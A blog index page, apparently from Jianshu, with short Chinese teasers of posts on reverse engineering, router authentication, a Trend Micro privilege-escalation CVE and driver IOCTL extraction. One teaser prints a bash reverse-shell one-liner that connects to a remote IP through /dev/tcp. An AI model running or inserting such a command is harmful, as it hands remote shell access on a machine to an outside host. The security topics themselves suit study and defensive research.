开始一段新的旅程，博客迁移至Island's Blog欢迎大家访问我的新博客，另外新博客里也做了评论系统，欢迎交流。简书上将不再继续更新 简书确...

http://note.youdao.com/noteshare?id=e55b73edde02c1057fe54f0cb0585070

关于我正在做的路由器的web认证方式是这样的： 客户端首先向服务器发送一条不带认证的get。 服务器返回 Authorization Requi...

Reverse Shell bash反弹服务端： bash -c 'sh -i &>/dev/tcp/210.28.30.887/53 0>&1...

这是一个比较简单的问题，但是思想走了一点弯路，觉得有必要记录一下.首先需要厘清几个概念： 文件偏移地址（File Offset） 装载地址 （I...

CVE-2018-6232这个漏洞允许本地攻击者通过有漏洞的趋势科技软件提权。为了利用该漏洞，攻击者首先得做到能在目标系统上执行低权限代码。这个...

我始终相信，所有这些兜兜转转循环往复的事，在多年后都终有意义 计划->执行->反馈 闭环对于任务第一反应首先不应该是立刻上手，计划是很重要的一步...

本文禁止转载经过多日探索，暂时找到了两种比较可靠的提取驱动IOCTL code的途径，以下对具体执行过程进行简介，并针对优缺点进行分析： IDA...